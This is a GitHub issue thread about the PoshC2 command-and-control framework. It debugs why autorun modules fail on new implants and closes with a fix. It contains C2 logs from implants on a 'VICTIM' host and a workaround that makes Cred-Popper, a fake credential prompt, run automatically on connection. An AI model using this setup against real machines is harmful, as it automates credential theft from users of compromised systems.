### ISSUE TITLE
Autoruns not triggering modules

### ISSUE THREAD

**Issue by S3cr3tHEr0** [nettitude/PoshC2_Python#41]
Environment:

Latest Kali Linux, (fully updated)
PoshC2, (Pulled from Git today)

Whenever triggering Autorun Modules for new implants I receive the following errors, even though the modules run fine when run manually on the Implant through the ImplantHandler. 

In the Server window, when a new Implant stages the and the Autorun tasks start, the following is output:

**Output from failed Autorun....**
```
Task 00003 (autoruns) issued against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:24)
loadmodule Stage2-Core.ps1


Task 00004 (autoruns) issued against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:24)
cred-popper.ps1

Task 00003 (autoruns) returned against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:25)
Module loaded sucessfully

Task 00004 (autoruns) returned against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:26)

ErrorCmd: The term 'cred-popper.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

```
It appears to be a case of the Autorun function lower casing the command for storage as issuing the command "_autorun LoadModule Cred-Popper.ps1_" returns "_add-autorun: loadmodule cred-popper.ps1_". The successful Autorun, (Task003), which is part of the automated Staging process shows that the "Stage2-Core.ps1" is correctly capitalised but the user added Autorun, (Task004), is not working.

However, when run directly on the Implant, by running the command "cred-popper", the Task completes successfully with a correctly capitlaised command, "_Cred-Popper.ps1_" and the following is output in the C2Server window:

**Output from successful run via Implant....**
```
Task 00005 issued against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
loadmodule Cred-Popper.ps1


Task 00006 issued against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
cred-popper 


Task 00005 returned against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
Module loaded sucessfully

Task 00006 returned against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:09)


[+] Cred-Popper started in background runspace

Run Get-Creds to obtain the output, when the user enters their credentials
```

Not all of the Autoruns are broken, for example the "_get-screenshot_" command runs without problem, but from what I can tell all the modules in the _PoshC2_Python/Modules_ fail:

**Output from working Autorun module....**
```
Task 00009 (autoruns) issued against implant 3 on host VICTIM\User* @ VICTIM (05/08/2019 20:37:51)
get-screenshot

Task 00009 (autoruns) returned against implant 3 on host VICTIM\User* @ VICTIM (05/08/2019 20:37:55)
Screenshot captured: /root/PoshC2_Project/downloads/VICTIM-05082019203755_jTXC3xWK9drEtkL.png

```
I've tried lowercasing the PowerShell script name to "_cred-popper.ps1_", which bypasses the error being thrown in the Task but the function appears to silently fail, so if anyone has any ideas for workarounds they'd be greatly appreciated!

**Comment by S3cr3tHEr0** [comment]
I've found that you can add tasks to _Implant.py_ after the successful call to _Stage2-Core.ps1_, which seems to work and now I can control and rate limit the flow of tasks etc by customising the implant:

`new_task("loadmodule Cred-Popper.ps1", "autoruns", self.RandomURI)
new_task("cred-popper", "autoruns", self.RandomURI)`

I also had a dig into the core issue of the Autorun functions not working, I didn't get very far but hopefully this solution will be useful to anyone else encountering it.

**Comment by benpturner** [comment]
Yeah this is a work around, we need to look into a better way to loadmodules in the autoruns

**Comment by m0rv4i** [comment]
Thanks for taking the time to add this @S3cr3tHEr0, this should now be fixed on master:
```
[3] New PS implant connected: (uri=11223344 key=112233344=)
127.0.0.1:61949 | Time:10/06/2019 10:27:29 | PID:8564 | Sleep:5s | User @ VICTIM (AMD64) | URL:https://127.0.0.1:443


Task 00003 (autoruns) issued against implant 3 on host DOMAIN\User @ VICTIM (10/06/2019 10:27:35)
loadmodule Stage2-Core.ps1


Task 00004 (autoruns) issued against implant 3 on host DOMAIN\User @ VICTIM (10/06/2019 10:27:35)
loadmodule Cred-Popper.ps1


Task 00005 (autoruns) issued against implant 3 on host DOMAIN\User @ VICTIM (10/06/2019 10:27:35)
cred-popper


Task 00003 (autoruns) returned against implant 3 on host DOMAIN\User @ VICTIM (10/06/2019 10:27:37)
Module loaded sucessfully

Task 00004 (autoruns) returned against implant 3 on host DOMAIN\User @ VICTIM (10/06/2019 10:27:38)
Module loaded sucessfully

Task 00005 (autoruns) returned against implant 3 on host DOMAIN\User @ VICTIM (10/06/2019 10:27:39)


[+] Cred-Popper started in background runspace

Run Get-Creds to obtain the output, when the user enters their credentials
```
If you're able to confirm I'll close the issue. 

Note your original autoruns command is `cred-popper.ps1` above but it should be `cred-popper` as that's the actual command (like in your comment).

@benpturner autoruns are only supported by the PS handler, we may want to think about adding them for the other implant types, maybe `add-ps-autorun`, `add-py-autorun` etc..?
